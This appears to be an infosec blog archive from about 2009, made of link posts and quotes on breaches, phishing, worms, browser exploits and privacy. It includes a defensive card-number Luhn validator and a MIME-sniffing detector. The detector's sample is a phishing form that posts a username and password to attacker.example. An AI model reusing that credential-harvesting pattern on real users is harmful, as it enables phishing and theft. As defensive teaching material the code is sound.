8 Questions For Uncovering Information Security Vulnerabilities - CIO.com - Business Technology Leadership

Andrew Jaquith considers 8 hypotheses, and for each provides diagnostic questions. A great read.
  1. The network perimeter is porous, permitting easy access to any outsider.
  2. An outsider can readily obtain access to internal systems because password policies are weak.
  3. Once on the network, attackers can easily obtain administrator credentials.
  4. An intruder finding a hole somewhere in the network could easily jump straight to the core transactional systems.
  5. Workstations are at risk for virus or worm attacks.
  6. Viruses and worms can spread quickly to large numbers of computers.
  7. Application security is weak and relies too heavily on the “out of the box” defaults.
  8. The firm’s deployments of applications are much riskier than those made by leaders in the field (for example, investment banking).
Src: 8 Questions For Uncovering Information Security Vulnerabilities | CIO.com [tx to @lennyzeltser]

QOTD on Knowledge vs Training

Knowledge without training is like driving a standard (i.e. manual transmission) without practice - you generate a lot of sputtering noises but achieve little forward motion. -- Dr. Christophe Veltsos, Dr. InfoSec™
This quote is written in response to comments exchanged on the Security Metrics mailing list regarding the value of certifications (which were deemed to be "training").

QOTD on Data Security for CISOs

An excellent article on CSO Online, written by Andrew Jaquith, on where CISOs should focus their efforts at securing data.
Instead of trying fruitlessly to be the enterprise's all-knowing content guardian, censor authority, and compliance guru, the CISO devolves responsibility of these activities to the business. IT security becomes a clearinghouse for data security tools that business groups can use as they see fit.
As well as:
Responsibility for classifying information and restricting its flow is ultimately a business challenge, not a technical challenge. How documents, spreadsheets, and emails are used depends on workgroup and business unit preferences. So it is with data security.

That means that inside counsel owns email eDiscovery and retention, product engineering owns CAD drawings, and finance owns accounts and earnings projections. These groups know who should and should not have access and what should happen if their assets are misused. IT security's primary role should be to help source, design, and install the technical controls in place that will enable them to express and enforce their compartmentalization needs—not to be the gatekeeper.
Src: Data Security: Whose Job Is It Really? | CSO Online

Researchers can ID anonymous Twitterers

Those who still think they can use social networking sites and be anonymous should read this article about research done at the University of Texas Austin. Arvind Narayanan, one of the researchers, said: "The more of a person's network you can map out, the easier it gets to de-anonymize someone in the future."

Src: Researchers can ID anonymous Twitterers | InfoWorld [tx @geekgrrl]

2nd big Firefox exploit found in a week

Mozilla, maker of the Firefox browser, will be releasing an update early next week for a newly discovered exploit. This exploit "provides an opening through which attackers can enter Firefox source code and modify it. If a Firefox user simply views a maliciously coded XML file on a website, in a style of attack known as a drive-by download, the exploit installs unwelcome software onto the victim's machine." [emphasis mine]

The high-priority update will fix the flaw, which is reported to work on multiple platforms (Windows, Mac, Linux).

Src: "High-priority" Firefox patch being readied | SC Magazine US

Cybercrooks drooling over social net data

Security professionals have long warned about the abundance of information that people are willing to share about themselves and others, including relatives, friends, and even perfect strangers. This data is useful to cyber criminals seeking to guess your password, reset your account, or fool you into clicking, viewing, or downloading malicious content.

The funny thing is that security professionals are people too, and they also use social networking sites. You can follow many of them on Twitter, for example; the SecurityTwits database is a good place to start. Just don't expect to find much personal data or easy-to-guess passwords.

Src: Cautionary tales from the social-networking universe | csmonitor.com

UK ex-spy boss all for preemptive surveillance

David Omand, former director of the UK's Government Communications Headquarters, released a study about the need for government-level digital surveillance. Among the more troubling of his statements is his view that "finding out other people's secrets is going to involve breaking everyday moral rules."

His vision of preemptive surveillance includes monitoring of "databases of airline bookings, advance passenger information, financial, telephone, tax, health, passport and biometric records and phone and internet communications."

He is also reported as saying that "sacrificing some privacy is preferable to other ways of boosting security such as altering the criminal law to make it easier to convict." [emphasis is mine]

Src: UK must pry on data to block threats: ex-spy boss | Reuters

QOTD Rebecca Herold on ID Theft Motivations

Any business, of any size, in any industry, in any location, is a possible target for PII [Personally Identifiable Information] theft and cybercrime if they possess any type of employee, customer or other consumer PII. -- Rebecca Herold, aka The Privacy Professor, Principal of Rebecca Herold & Associates LLC
Src: Many Motivators For Identity Theft | Realtime IT Compliance
Link: Rebecca Herold's Web Site

Newfangled rootkits survive hard disk wiping

While security researchers have been looking into the possibility of using the BIOS to create a permanently infected machine for some years, the Core Security team is reported to have devised a technique that would work on "virtually all types of systems."
Because the infection lives in the computer's BIOS, or basic input/output system, it persists even after the operating system is reinstalled or a computer's hard drive is replaced.
Src: Newfangled rootkits survive hard disk wiping | The Register

Sneakey can duplicate a key from 200ft away

Can you have data security without physical security? I hope you know the answer for your particular facility in light of this research project from the University of California San Diego called "Sneakey." Sneakey is software that can create a physical duplicate of a key from a digital image. In an experiment conducted from 195ft away, the researchers were able to take a digital photo (zoom lens) of a key chain and match all 5 bitting codes (the indentations on the keys), enough to be able to create a duplicate key.

Src: Sneakey Robbers Turn to the Social Web - ReadWriteWeb [tx @lennyzeltser]

Phishing, vishing and unscrupulous tax preparers pose a threat

Tax documents are a treasure-trove of information, containing name, date of birth, social security number, and current address. I find the lack of concern for one's most sensitive information most disappointing (note: small sample size, only 1,091 participants surveyed in Feb 2009):
The survey also showed that 1/3 of the respondents who rely on the services of a tax preparer were not at all concerned about the possibility of becoming victims of identity theft when choosing their preparer. An additional 23 percent were somewhat concerned and only 18 percent were very concerned.
Src: Phishing, vishing and unscrupulous tax preparers pose a threat
Src2: Affinion Security Center Survey Finds Taxpayers are Vulnerable to Tax- and Employment-Related Identity Theft | PRNewsWire.com

Helping SMBs take definite steps to face threats

Small and medium-sized businesses are often at a loss when it comes to the threats they face and the mitigation strategies they should pursue. While written by a security vendor, GFI, the nine-page document is a worthwhile read for any SMB.
The key to making corporate systems safer does not only require investment in software or hardware security products; very often more knowledge, awareness and a better understanding of existing security policies would be enough to reduce the risk of malware infection, data leakage and fraud.
Src: Helping SMBs take definite steps to face threats

SEO-enhanced cybercrime nets $10K a day

The security firm Finjan has released their latest Cybercrime Intelligence Report. Cybercriminals used affiliate networks to boost their malware and rogueware distribution, using Search Engine Optimization (SEO) techniques to drive additional traffic, and thus revenue. In this case, they made $172,800 in 16 days.

Src: Finjan’s Research Reveals Cybercrime Path to Millions | Finjan

Webcams used to monitor response to bomb threats

Investigating a number of bomb threat hoaxes targeting several college campuses (including Boston College, Purdue University, Clemson University, University of North Carolina, and Florida State), police found that the suspect then used internet-accessible webcams at each campus to monitor the law enforcement response.

Src: Bomb hoax strikes several campuses | The Heights [tx @lennyzeltser]

QOTD - Marcus Ranum on ID Theft Victims

Meanwhile, the real victims - people who suffer from identity theft, lost time, or credit fraud - get a nice little letter telling them 'We made a mistake and it's your problem to clean it up. Have a nice day.' To me, the banks and payment companies who are suing each other and finger-pointing are a side-show; they're in business and are simply incurring an unexpected cost for mistakes made. Let's not overlook the victims: real human beings. -- Marcus Ranum, CSO Tenable Security.
Src: SANS NewsBites Vol 11 Num 22

QOTD - Firefox+Windows=Secure?

For all the browsers on operating systems, the hardest target is Firefox on Windows. With Firefox on Mac OS X, you can do whatever you want. There’s nothing in the Mac operating system that will stop you.
The quote is from Pwn2Own hacker Charlie Miller, interviewed by ZDNet's Ryan Naraine. Charlie was the first to break into a Safari browser running on a (patched) MacBook.

Src: Questions for Pwn2Own hacker Charlie Miller | ZDNet.com [tx @alespe]

QOTD on Conficker & Analysis by SRI

Leave it to the folks at SRI International to publish one of the best writeups on the workings of the worm and its impact on honeynets, where it takes over as the dominant infection. They also just recently updated their Conficker worm analysis (see direct link to addendum below).
Why Conficker has been able to proliferate so widely may be an interesting testament to the stubbornness of some PC users to avoid staying current with the latest Microsoft security patches. Some reports, such as the case of the Conficker outbreak within Sheffield Hospital's operating ward, suggest that even security-conscious environments may elect to forgo automated software patching, choosing to trade off vulnerability exposure for some perceived notion of platform stability.
Src: An Analysis of Conficker | SRI International
Src: Addendum on Conficker C (dated March 19, 2009) [tx @evilalien]
Src: Additional Conficker links (SANS ISC)

Sniffing keystrokes via laser and keyboard power

This news article reports on a recent CanSecWest presentation by researchers from a company called InversePath into two different methods of sniffing keyboard activity from 50ft away, one using a laser (w/ line of sight to a laptop), the other from signals emanating from a PS/2 keyboard plugged into a grounded outlet (via PC apparently).

Src: Sniffing keystrokes via laser and keyboard power | CNET News [tx @the_ryebread]

QOTD on patching

It's time for the vendors that want to continue to sell to important organizations to take responsibility for active patching. -- Alan Paller, Director of Research, SANS Institute
Src: SANS Institute - @RISK: The Consensus Security Vulnerability Alert

Anatomy of Credit Card Numbers

If you've ever been curious as to what information went into a credit card number, this is a good read. It provides enough details to be able to create a simple program to validate credit card numbers.

Src: Anatomy of Credit Card Numbers [tx @jmcmurry]
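As an added example (not code from the linked article), here is a Python sketch of the standard card number layout (ISO/IEC 7812, from general knowledge rather than from the page): the first digit's industry identifier, the six-digit issuer identifier, the account number, and the trailing Luhn check digit. It also shows the defender's side of the same check: scanning text for Luhn-valid numbers so a data-leakage filter raises fewer false positives on phone numbers and order references. The sample text at the bottom is constructed.

```python
"""Parse and validate payment card numbers (added example, not the article's code)."""

import re

# Major Industry Identifier: what the first digit of a card number means (ISO/IEC 7812).
MII = {
    "1": "airlines",
    "2": "airlines/financial",
    "3": "travel and entertainment",
    "4": "banking and financial",
    "5": "banking and financial",
    "6": "merchandising and banking",
    "7": "petroleum",
    "8": "healthcare/telecommunications",
    "9": "national assignment",
}


def luhn_checksum_valid(digits: str) -> bool:
    """Luhn (mod 10) check: walking from the right, double every second digit,
    subtract 9 from any doubled value above 9, and require the sum to be a multiple of 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit, counting the check digit as position 0
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def luhn_check_digit(partial: str) -> str:
    """Return the single digit that makes partial + digit pass the Luhn check."""
    for candidate in "0123456789":
        if luhn_checksum_valid(partial + candidate):
            return candidate
    raise AssertionError("exactly one digit always satisfies the Luhn check")


def parse_card_number(raw: str) -> dict:
    """Strip spaces/dashes and split the number into its standard fields."""
    digits = re.sub(r"[\s-]", "", raw)
    if not digits.isdigit() or not 12 <= len(digits) <= 19:
        raise ValueError("card number must be 12 to 19 digits")
    return {
        "mii": MII.get(digits[0], "unknown"),
        "iin": digits[:6],            # issuer identification number (first six digits)
        "account": digits[6:-1],      # individual account identifier
        "check_digit": digits[-1],
        "luhn_valid": luhn_checksum_valid(digits),
    }


# 13 to 19 digits, optionally separated by single spaces or dashes.
CANDIDATE_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")


def find_card_numbers(text: str) -> list:
    """Defender's use: return normalised digit strings in text that look like
    card numbers AND pass Luhn, dropping look-alikes such as phone numbers."""
    found = []
    for match in CANDIDATE_RE.finditer(text):
        digits = re.sub(r"[ -]", "", match.group(0))
        if luhn_checksum_valid(digits):
            found.append(digits)
    return found


if __name__ == "__main__":
    # Constructed sample: a well-known Luhn-valid test number, one invalid number, one phone number.
    sample = "Order ref 5551234567, card 4111-1111-1111-1111, bad card 4111 1111 1111 1112."
    print(parse_card_number("4111 1111 1111 1111"))
    print(find_card_numbers(sample))
```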

How much should you spend on security?

Depending on the source (Gartner vs Forrester), security spending is anywhere from 5% to almost 12% of IT expenditures.

Src: Forrester security spending report | Boaz Gelbord Blog

$100,000 for a browser hack?

According to this article from The Register, "a reliably exploitable IE vulnerability now fetches $100,000 on the black market." While the dollar figure itself may be debatable, one fact isn't: most hackers are in it for the money, the rest are security researchers. At the Pwn2Own 2009 competition, "Nils", a student from the University of Oldenburg in Germany, was able to compromise Safari, IE8, and Firefox.

"Virtually any internet-facing software can be proven vulnerable to real-world exploits." Gentlefolks, start your virtual machines (for an extra degree of protection).

Src: A grim day for browser security at hacker contest | The Register

Staying safe while on Safari, IE, Firefox

For those who still believe that their favorite browser (in this case Safari, but ultimately it could be any browser) is still safe in a sea of network attacks, think again. At the 2009 Pwn2Own competition, Charlie Miller was able to compromise a Safari browser in a matter of seconds. Firefox and IE8 were also no match for a hacker called "Nils" (who also took 2nd place against Safari).

For the more paranoid among you, now would be a good time to look at segregating your sensitive data off of your regular machine, or to start running browsers in virtualized environments (either full VMs or application virtualization).

Src: Pwn2Own 2009: Macbook falls in seconds | Zero Day | ZDNet.com
Src: Updated story about IE8 | Zero Day | ZDNet.com [tx @RyanNaraine]

Fortify Software releases guidelines on unsafe cryptographic algorithms

If you're in software development or security, one of the questions you should be asking is which cryptographic algorithms are still safe to use. Why? One reason is that with every passing year, CPUs get faster and are now multi-core, memory gets bigger, and networks get more bandwidth. The other is that researchers find flaws and vulnerabilities - some are due to implementation errors, but others stem from the algorithms themselves.

So, if you're wondering if you should still be using MD5 hashes or 256-bit RSA encryption, go read this document for security's sake.

Src: Guidelines on unsafe cryptographic algorithms [tx @tolzak]
Direct link to PDF

Dutch supermarket fingerprint payments plan shelved

In the first weeks of the trial a security expert managed to pay using someone else's fingerprint.
I wonder what the Crossover Error Rate was for this Tip2Pay fingerprint reader system.

Src: Dutch supermarket fingerprint payments plan shelved | Finextra

QOTD - Schultz on Monitoring vs European Privacy Laws

Privacy protection is a major issue and priority in most European countries. At the same time, however, the need for monitoring user Internet activity for discovering illegal activity, identifying employee misconduct, and so on is growing. In the process of achieving equilibrium between privacy and monitoring, some compromises concerning individuals' right to and expectation of privacy will certainly have to be made (as is occurring in Finland), something that will not sit well with most Europeans. -- Dr. Eugene Schultz, CTO of Emagined Security and member SANS NewsBites editorial board
Src: SANS Institute - SANS NewsBites Vol 11 Num 21

QOTD - Knock knock, it's the FTC

Jon Leibowitz, FTC Chairman, warned companies that they must "protect their back doors from hackers, malware, spyware and other high-tech intrusion mechanisms and protect their front door by properly storing and disposing of consumers' data." He indicated that FTC will not be shy about knocking on a company's door to evaluate their practices.

Speaking at the "Securing Personal Data in the Global Economy" conference on March 16, 2009, he also said: "Without adequate data security there really is no privacy."

Src: Leibowitz Pushes For Privacy Harmonization | National Journal Online

Dirty bomb fake news report making the rounds

It has the hallmarks of a real story, usually starting with "At least 12 people have been killed and more than 40 wounded in a bomb blast near market in..." However, don't be fooled by this message claiming to be from the Reuters news agency (it is not) which seems to be based on a story similar to this BBC news report (dated March 6, 2009).

The fake news report contains a link to a web site which then customizes the story based on your IP address and serves your machine with the Mal/WaledPak-E (aka Packed.Win32.Krap.i) malware.

Src: Dirty bomb news report leads to PC infection | Graham Cluley's blog

Stolen computer at UT exposes data on 24K students and 450 faculty

An apparent break-in at an office in the College of Arts and Sciences at the University of Toledo, Ohio yielded more than just a computer: university officials will also be notifying 24,000 students about FERPA data exposure (student ID # and grades). More troubling is that the stolen computer also had data on 450 faculty, including names, birth dates and SSNs.

As is unfortunately too common across most colleges/universities,
The personal data was saved on the computer itself and not on the university's network, which officials are encouraging staff to do.
A university official claimed that the "computer was password protected and many of the files were specifically encrypted or individually password protected." However, as security professionals caution, using "password-protected" documents (i.e. MS Word, MS Excel, PDFs) is not considered strong protection, as this "protection" can easily be cracked or bypassed.

Src: Stolen computer at UT contains personal information of students, faculty

QOTD on Twitter

Twitter is to infosec professionals today what the ARPANET was to university researchers in the early 80s - a communication revolution connecting the best minds on the planet. -- Dr. Christophe Veltsos, Dr. InfoSec™

Who else could connect IT and PigglyWiggly?

Managing Information Technology (IT) doesn't have to be boring. This blog post from Kevin Behr manages to connect IT management (focus on automation) and Piggly Wiggly, a chain of grocery stores mainly in the Southern US.

Src: In Search of The Ultimate IT Robot (Ever been transformed by a trip to Piggly Wiggly?) - /kevinbehr/home

5 Steps to Communicate Security's Value to Non-security People

Anyone who's had the opportunity to hear, read, or talk to Michael Santarcangelo, founder of Security Catalyst, knows him for his focus on the people side of information security. In this interview with CSO Online, Michael has some tips for security professionals to help them get executives and boards to understand and approve spending decisions in these tough economic times.

Src: 5 Steps to Communicate Security's Value to Non-security People | CSO Online

BBC-controlled botnet - legal or not?

This is as controversial as it gets. As part of a news media show called "Click", the British Broadcasting Corporation (BBC), ran a story about cyber security in which it controlled a botnet of at least 22,000 computers. It used the botnet to send spam (to their own account) and to perform a Distributed Denial of Service attack (DDoS) with permission of the site owner. Once done with their experiment, the BBC "warned users that their PCs are infected, and advised them on how to make their systems more secure" by modifying their desktop background.

There are several actions for which the BBC could find themselves in hot water:
  1. They may have violated the UK Computer Misuse Act by sending spam.
  2. They may have violated laws by conducting a DDoS attack.
  3. They may have violated laws by changing content on compromised machines (i.e. zombie machines part of the botnet), in this case modifying the desktop background image.
Src: BBC team exposes cyber crime risk
Src: Did BBC break the law by using a botnet to send spam? | Graham Cluley's blog

QOTD - Marcus Ranum on Encryption & Data Leaks

Writing about yet another report of a lost memory stick containing unencrypted sensitive data, Marcus Ranum had this to say:
Let people copy critical data around, and critical data will leak; it's that simple. Encryption is not a panacea, because of the prevalence of keylogging trojans and the fact that people will have to have the data unencrypted, at some point, in order to use it. The answer to data leakage is data control. There is no "plan B". -- Marcus Ranum, member SANS NewsBites editorial board
Src: SANS NewsBites Vol 11 Num 19

On physical security and Linux password resets

For those who still believe that physical security is not a big issue with respect to data security, this illustrated tutorial can help you see the light of just how easy it can be to change the password for the root account on a Linux machine.

Assumptions are that the machine is not encrypted and can be rebooted (usually trivial to reboot a machine if you are sitting in front of it, i.e. physical access).

Src: How To Reset Any Linux Password | MakeUseOf.com [tx to @robpickering]

QOTD on good security metrics

NIST has just released a draft version of publication Directions in Security Metrics Research in which it outlines several properties of good information security metrics (emphasis mine):
To be of value, the method of measurement employed should be reproducible, that is, capable of attaining the same result when performed independently by different competent evaluators. The result should also be repeatable, such that a second assessment by the same evaluators produces the same result. Relevance and timeliness are also implicit considerations, since it is of little benefit to have measures that are not meaningful or whose latency exceeds their usefulness.
Src: Directions in Security Metrics Research (Draft-NISTIR-7564.pdf)

[Humor] SPPD - the Security Patch Procrastination Disorder [Humor]

[Disclaimer: this is a work of fiction meant to be humorous and not a true medical, IT, or InfoSec condition]

SPPD - Security Patch Procrastination Disorder
--- Symptoms and treatment options ---

Note: only an experienced Information Security Professional can make an actual SPPD diagnosis.

The Security Patch Procrastination Disorder is characterized by a general complacency towards the deployment of security patches. In its most extreme form, it is often accompanied by delusions that patching is simply not required for secure IT operations. When this behavior continues during widespread reports of critical patches, it is referred to as Acute Security Patch Procrastination Disorder or ASPPD for short.

SPPD often starts as a benign case of FSOS, or False Sense Of Security, often resulting from unprotected and unmitigated contact with vendor-based security marketers. If left untreated, FSOS eventually erupts into full-blown SPPD (see list of symptoms below). If diagnosed early by an Information Security Professional, SPPD can be treated with simple, but regularly scheduled, applications of COTS patches, also known as Commercial-Off-The-Shelf patches.

SPPD diagnosis requires the presence of at least two of the following symptoms, observed for at least one month:
  • Disorganized patching behavior (infrequent patching habits and other incoherent statements like "we apply critical security patches when we see a need")
  • Delusions about the state of software or hardware security (i.e. "what's the worst a software bug can do?")
  • Hallucinations about vendor fairies protecting the data (i.e. "but we're running appliance X from SuperDuperVendor and they used certified pixie dust.")
If after appropriate information security evaluation and reassurance the condition persists, the entity is likely to suffer debilitating cases of JBH, or Just Been Hacked, often accompanied with MSG$, Must Spend Gazillion Dollars.

QOTD on security awareness & education

Speaking about the need to educate users about information security and phishing attacks, Rohyt Belani, CEO of The Intrepidus Group, said:
user education should be approached like a marketing exercise -- if users are nodding off, it will never be effective.
The information security community needs to get more creative in educating users about the dangers facing them in this web 2.0 world. How about a series of books and cartoons portraying the average users and the mean hackers?

Src: 23 percent of users fall for spear phishing | SC Magazine US

The dynamics of successful phishing attacks

Who's better at thwarting phishing attacks, men or women? According to a recent study, neither. Both men and women are equally susceptible to falling for a phishing attack. 23% of people will fall for (i.e. believe in) a spear phishing (i.e. targeted phishing) attack. Attacks written with an authoritative tone are 40% more successful than those offering a reward (bribe).

The SCMagazine article has several interesting points from Joshua Perrymon, CEO of PacketFocus: “We see around 70 percent response with directed attacks.” Perrymon also cautioned that cultural differences will impact the phisher's success: in the US, China, and Japan, authority is seldom challenged, a trait that the phishers can use to their benefit.

Src1: New study details the dynamics of successful phishing | ZDNet.com
Src2: InfoSec: 23 percent of users fall for spear phishing
Presentation slides (PDF)

No User Action Required In Newly Discovered PDF Attack

I've had the good fortune of following Didier Stevens on Twitter for a few months and his research into various software flaws is nothing short of amazing. Didier has managed to demonstrate without a doubt that the latest Adobe PDF Zero-day flaw can trigger an attack even without user intervention. The culprit is one of the many things that your machine does in the background, in this case, the Windows Indexing Service (WIS). In order to index the contents of a PDF file, WIS needs to process it. Yet, the code responsible for processing the PDF is itself vulnerable to this latest attack, which leads to the compromise of a process running with local system privileges.

Src: No User Action Required In Newly Discovered PDF Attack | DarkReading [tx to @gattaca]

Conficker gets upgraded with defenses

Much like a business has to innovate to survive, malware authors have shown remarkable imagination and determination in growing and securing compromised machines. The latest news report covers enhancements the Conficker (aka Downadup) worm has received, including being more resilient against antivirus and analysis tools, as well as expanding the list of potential domains it phones home to from 250 to 50,000 per day.

Src: Conficker gets upgraded with defenses | The Register [tx to @kriggins]

Academic Claims to Find Sensitive Medical Info Exposed on Peer-to-Peer Networks | Threat Level from Wired.com

If by some chance you still believe that no harm can come to you from operating (or failing to detect) a Peer-to-Peer (P2P) network, then please read one of these posts if you have any kind of sensitive data about other people.

Src: Academic Claims to Find Sensitive Medical Info Exposed on Peer-to-Peer Networks | Threat Level from Wired.com
Src: Medical data leakage rampant on P2P networks - SC Magazine US

The truth about Twitter Search

This post confirms a theory stemming from the recent adult webcam spam attack. While Twitter officials said they removed the "spammy" posts, a Twitter search revealed that deleted tweets never die. It appears the Twitter search engine ignores deletions and happily displays both valid and deleted posts for all to see.

To prove the theory, I decided to tweet and quickly delete the following: "This message has been deleted and should NOT show up in Twitter search." If you search for it on Twitter search (and possibly other third-party search tools), it will show up. If you don't feel comfortable clicking the link, copy/paste the text into Twitter search. To verify that the message has been deleted, you can click on "View Tweet" which will let you know that the message no longer exists.

This behavior exposes people's mistakes, and in the case of this recent attack, continues to paint a virtual target on their backs by revealing who fell for the scam in the first place. Twitter users, beware.

[Update 4/11/09: It appears that Twitter is now removing older tweets from the search results. To reactivate the tweet referred to in this blog post, I simply posted it again today, and promptly deleted it... but, as explained above, it still shows up in the search results.]

Trolling for easy victims using Twitter

[Last updated on 3/7 at 8:00a CST - see bottom of post]

It's no secret that people have to be mindful of their social networking activities. The information security community has been sounding the alarm for several years, and now the message is finally reaching the mainstream media.

However, what the average user doesn't realize is that their actions speak louder than their status updates. Let me explain. Let's assume we have two social network users, Jane and John. While both are mindful of the information they post about themselves, Jane is more cautious than John, the latter being more "click-happy."

Reports of attacks on social networking sites are an almost monthly occurrence. Sometimes the attacks take advantage of vulnerabilities in the design or implementation of the various sites or third-party add-ons. Yet, most often, the attacks simply use the flexibility and openness of the social networks and their unsuspecting users as a vector of attack. The latest example, reported today by Sophos' Graham Cluley, consists of Twitter messages touting interesting webcam conversations on a site called "chatwebcamfree.com".

While cautious Jane ignored the tweet, John's curiosity got the best of him: he clicked on the link. The result is that John's Twitter account now sends a tweet touting the same site, which reaches all of John's followers. As of 19:20 (CST), it is still unknown how the attack works, i.e. how it manages to send a tweet using John's account. However, there are several known attacks which could be used to obtain that behavior. The web site displays a web form asking for account credentials; it may be infecting the user's machine and may also be gathering passwords.

Now, any Twitter user who fell for this attack has in effect painted a large target on his back. Locating these users now becomes as simple as searching for the right term. A quick search reveals well over 500 posts containing the name of the target web site. While the oldest post is dated from 26 days ago, 99% of the activity seemed to have occurred today. Each of these users may now become the target of additional attacks.

Remediation strategies should of course help users exercise caution in their surfing habits. However, it may also fall on Twitter to remove these tweets in order to control the infection and help protect those that were lured from additional attacks.

As of 8:14p CST, Twitter has confirmed that 750 accounts fell prey to the adult webcam spam attack. However, while Twitter claims to have removed the "spammy" status updates, the searches conducted at 6:30p and at 8:30p show otherwise as the screenshot below indicates.

As of 8:00a CST on 3/7/2009, a Twitter search still reveals 48 pages (up from yesterday's 47 pages) of matches to the search term, clearly exposing people's susceptibility to clicking dangerous links.

Another QOTD on good security

Organizations vary in their cultures. We expect, then, to find different cultural approaches to security management that apply to each organization [...] An important indicator as to the success of the security role is whether or not the protected population are inclined to comply with security controls, or work around them. Also, do they [users] feel like they can and should approach the security personnel when something looks awry.

I want a devil on my nuclear submarine [...] I want an entrepreneur in my consultancy and hospital. On a nuclear submarine the devil will be respected, but the entrepreneur will be less trusted or tolerated. In a consultancy, the response to the personalities will be reversed.
Posted by Chris Cronin in a SANS/GIAC discussion thread about good security (and reprinted with permission).

QOTD on good security

Good security will almost always make people's jobs harder. There is no need to make their jobs harder "just because we can." -- John Mark Allen, posted earlier today on SANS GIAC Advisory board mailing list, in reply to a somewhat heated discussion about security enforcement (reprinted with permission of the author).
I would also like to point the reader toward another related post by Dave Shackleford on "Practical Intelligence" in Infosec, dealing with the need to work with users instead of against them.

QOTD on data theft by insiders

When someone faces the prospect of losing a job, they will do anything to ensure their family is fed and supported. Unfortunately, that includes doing things detrimental to their careers like stealing company information. It's our job to have the policies and security controls in place to protect our organizations and save people from themselves. -- Mark Weatherford, CISO for the State of California, and a member of the SANS NewsBites editorial board.
Src: SANS NewsBites Vol 11. Num. 17

The Building Security In Maturity Model (BSIMM)

Gary McGraw, Ph.D., and colleagues Brian Chess, Ph.D., and Sammy Migues have released the Building Security In Maturity Model (BSIMM), which is meant to provide guidance on building more secure software. The 53-page document is aimed at "anyone charged with creating and executing a software security initiative." BSIMM also cautions that any software security initiative needs proper backing and visibility:
Most successful initiatives are run by a senior executive who reports to the Board or the CIO of an organization. These executives lead a group that we call the Software Security Group (SSG), charged with directly executing or facilitating the activities described in BSIMM. BSIMM is written with the SSG and SSG leadership in mind.
This is an important body of work with input from representatives of Adobe, EMC, Qualcomm, Google, Wells Fargo, and Microsoft. The document is licensed under the Creative Commons Attribution-Share Alike 3.0 License (for license details, go to http://creativecommons.org/licenses/by-sa/3.0/).

Src: The Building Security In Maturity Model (BSIMM)

QOTD human dimension to security

In February 2009, the federal government was presented with a new report identifying strategic objectives for improved cyber-security. Produced by the Institute for Information Infrastructure Protection (I3P), the report examines the cyber-security challenges facing the economic, physical, and human infrastructures and calls for making cyber-security a national priority.
People must be engaged as a positive force to improve cyber security. Information security systems must be easy to use by non-IT professionals; awareness and education campaigns must be directed at the public and private sectors; and security training should be taught in schools.
Src: Press release from Senator Lieberman | US Senate
Src: Full report (PDF) | I3P

Andrew Jaquith on data breaches - laptops vs servers

Servers tend to be 8-10x more radioactive than endpoint computers -- Andrew Jaquith, Forrester
Earlier today, I had the chance to read an email that Forrester's Andrew Jaquith had posted. I asked him if he would share some of this early research with the rest of the community and was happy to see that he did.

Mining the information contained in the DataLossDB, Andrew found that while laptop-related breach reports grab the headlines, they often account for only a fraction of the number of records exposed by server breaches.

Src: Lost Laptops Get the Press; Server Breaches Cause More Stress | The Forrester Blog For Security & Risk Professionals

Mime Sniffing and Phishing

Arbor Networks has blogged about a phishing attack that exploits the fact that IE does not trust the Content-Type header returned in an HTTP response and instead tries to detect the MIME type on its own by inspecting the body. In this case, phishers serve content with a misleading declared type so that the phishing page renders as HTML only in IE, while other browsers show harmless-looking text. IE8 added the X-Content-Type-Options: nosniff response header, which tells the browser to honor the declared Content-Type; sites that serve user-controlled text should send it, but it does nothing for visitors running older versions of IE.

Src: Mime Sniffing and Phishing | Arbor Networks Security
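To make the mismatch concrete, the following is an added example (not from the Arbor post or this blog) that parses a raw HTTP response and reports the type a sniffing browser would render versus the declared one. The sample responses are constructed, and the tag list and 256-byte window are a simplified model of IE's behavior rather than its published algorithm.

```python
import re

# Constructed sample: the phishing pattern described above. The body is HTML but
# is declared as text/plain, so a header-trusting browser shows raw text while a
# sniffing browser renders the login form. (attacker.example is a placeholder.)
PHISH_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b"<html><body><form action='http://attacker.example/login' method='post'>"
    b"Bank login: <input name='user'><input name='pass' type='password'>"
    b"</form></body></html>"
)

# Same body, but the server opts out of sniffing; IE8 honours this header.
HARDENED_RESPONSE = PHISH_RESPONSE.replace(
    b"Content-Type: text/plain\r\n",
    b"Content-Type: text/plain\r\nX-Content-Type-Options: nosniff\r\n",
)

# Tags whose presence near the top of a body makes a sniffing browser treat it
# as HTML. This approximates the classic IE heuristic; it is an assumption.
HTML_MARKERS = re.compile(
    rb"<\s*(!doctype html|html|head|body|script|iframe|form|a |img|title|div|table)",
    re.IGNORECASE,
)
SNIFF_WINDOW = 256  # bytes inspected; modelled on IE's historical window


def parse_response(raw):
    """Split a raw response into a lower-cased header dict and the body bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return headers, body


def declared_type(headers):
    """Media type from Content-Type, without parameters such as charset."""
    return headers.get("content-type", "").split(";", 1)[0].strip().lower()


def effective_type(headers, body, sniffing_browser=True):
    """Type the browser will treat the body as.

    sniffing_browser=True models IE overriding the header from body content;
    False models a browser that trusts the header (Firefox of that era).
    """
    declared = declared_type(headers)
    nosniff = headers.get("x-content-type-options", "").strip().lower() == "nosniff"
    if not sniffing_browser or nosniff:
        return declared or "application/octet-stream"
    if HTML_MARKERS.search(body[:SNIFF_WINDOW]):
        return "text/html"
    return declared or "application/octet-stream"


def sniff_mismatch(raw):
    """Return (declared, ie_effective, mismatch) for a raw response.

    A mismatch is the tell-tale of the phishing trick: the server claims one
    type, IE renders another.
    """
    headers, body = parse_response(raw)
    declared = declared_type(headers)
    effective = effective_type(headers, body, sniffing_browser=True)
    return declared, effective, declared != effective


if __name__ == "__main__":
    for label, resp in (("phish", PHISH_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, sniff_mismatch(resp))
```

Run against captured responses, the mismatch flag is a cheap proxy filter for pages that would look benign to a non-IE reviewer but render as a phishing form for IE users; the hardened variant shows that a single header removes the ambiguity for browsers that support it.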

2009 = infosec on a shoestring budget

